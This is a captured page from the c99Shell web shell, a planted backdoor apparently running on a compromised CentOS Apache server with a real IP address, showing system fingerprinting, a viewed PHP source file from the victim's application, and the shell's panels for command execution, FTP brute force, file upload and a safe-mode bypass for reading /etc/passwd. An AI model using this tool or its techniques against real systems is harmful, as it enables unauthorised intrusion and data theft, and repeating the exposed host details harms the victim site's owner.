110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reportEregis111/ drwxr-xr-x Free 52.63 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/ drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: pagebody.php (3.75 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<?php 
include_once("global.php");	
include_once("./classes/clsConnection.php");
include_once("./classes/clsDB.php");
include_once("clsUser.php");



session_start();
ob_start();
//if (session_is_registered("oU")) {
if (isset($_SESSION["oU"])) {
	$oU = $_SESSION['oU'];	
	$oU->Lang = ($lang=="") ? "th" : $GLOBALS['sysLang'];		//querystring when select language					
	if ($StID<>"") $oU->StID = $StID;			//querystring when selectmenu;
	if ($GpID<>"") $oU->GpID = $GpID;			//querystring when selectmenu;
	if ($MnID<>"") $oU->MnID = $MnID;			//querystring when selectmenu;
	$oU->GetRightsByMenu();		
}else {
	$sessionID = session_id();
	if ($oU->SessionID<>$sessionID){
		if ($_POST['refFromLogoutPage']==""){
			echo "<meta http-equiv='refresh' content='0; URL=../".$GLOBALS['sysUmPath']."/logout.php'>";
            header("Location: logout.php");
			exit();
		}
	}
}
include_once("./classes/clsTable.php");
include_once("./classes/clsForm.php");
//============================================================================

function pageHeader(){
	global $oU;
	echo "<html>\n";
	echo "<head>\n";
	echo "<title>SYSTEM</title>\n";
	echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"".$GLOBALS["sysUmPath"]."/css/format.css\">\n";
	echo "<script language=\"javascript\" src=\"".$GLOBALS["sysUmPath"]."/js/fns.js\"> </script>\n";
	echo "<script type=\"text/javascript\" src=\"".$GLOBALS["sysUmPath"]."/jscookmenu/JSCookMenu.js\"></script>\n";
	echo "<link type=\"text/css\" href=\"".$GLOBALS["sysUmPath"]."/jscookmenu/ThemeOffice/theme.css\" rel=\"stylesheet\" />\n";
	echo "<script type=\"text/javascript\" src=\"".$GLOBALS["sysUmPath"]."/jscookmenu/ThemeOffice/theme.js\"></script>\n";
	echo "<script type=\"text/javascript\" src=\"".$GLOBALS["sysUmPath"]."/js/ssm.js\"></script>\n";
	echo "<script type=\"text/javascript\" src=\"".$GLOBALS["sysUmPath"]."/js/ssmItems.js\"></script>\n";
	echo "<script language=\"javascript\" src=\"js/calendarDateInput2.js\"></script>\n";
	echo "</head>\n";
    echo "<!-- " . $GLOBALS['sysUmPath'] . "-->\n";
	echo "<body>\n";
	echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"1\" width=\"100%\" bgcolor=\"#CCCCCC\" align=\"center\" >\n";
	//==Banner at top.===========================
	//echo "<tr height=65>";
	//echo "<td  background=images/ums.png></td></tr>\n";
	//==menu================================
	echo "<tr bgcolor=\"#ffffff\" background=".$GLOBALS["sysUmPath"]."/images/bgmenu.jpg\">\n"; 
		echo "<td>\n";	
		//include  $GLOBALS["sysUmPath"]."/menu.php?UsID=".$oU->userID."&StID=".$oU->StID."&"."GpID=".$oU->GpID."&WgID=".$oU->WgID;
        $UsID=$oU->userID;
        $StID=$oU->StID;
        $GpID=$oU->GpID;
        $WgID=$oU->WgID;
        include("menu.php");
		echo "</td></tr>\n";
	//==user info=============================
	echo "<tr bgcolor=\"#ffffff\">\n";
		echo "<td>\n";	
		echo "<table cellpadding=0 cellspacing=0 width=100%>\n";
			echo "<tr>\n";
			echo "<td></td>\n";
			echo "<td align=right>".
					"เข้าสู่ระบบวันที่  &nbsp;".$GLOBALS["sysDate"]."&nbsp;".
					"&nbsp;<img src=".$GLOBALS["sysUmPath"]."/images/bullet_r.gif>&nbsp;&nbsp;".
					$oU->userName."&nbsp;<img src=".$GLOBALS["sysUmPath"]."/images/seperater.jpg>&nbsp;".
					"<a href=\"../". $GLOBALS["APPNAME"]."/logout.php\">";
					if ($oU->userLogin=="")
						echo "";
					else 
						echo "�͡�ҡ�к�";
					echo "&nbsp;</a> </td></tr>\n";
		echo "</table>\n";
		echo "</td></tr>\n";
	//============================================================================
	//start working in this td
	//============================================================================
	echo "<tr bgcolor=ffffff height=400>\n";
		echo "<td valign=top>\n";		
}

?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0052 ]--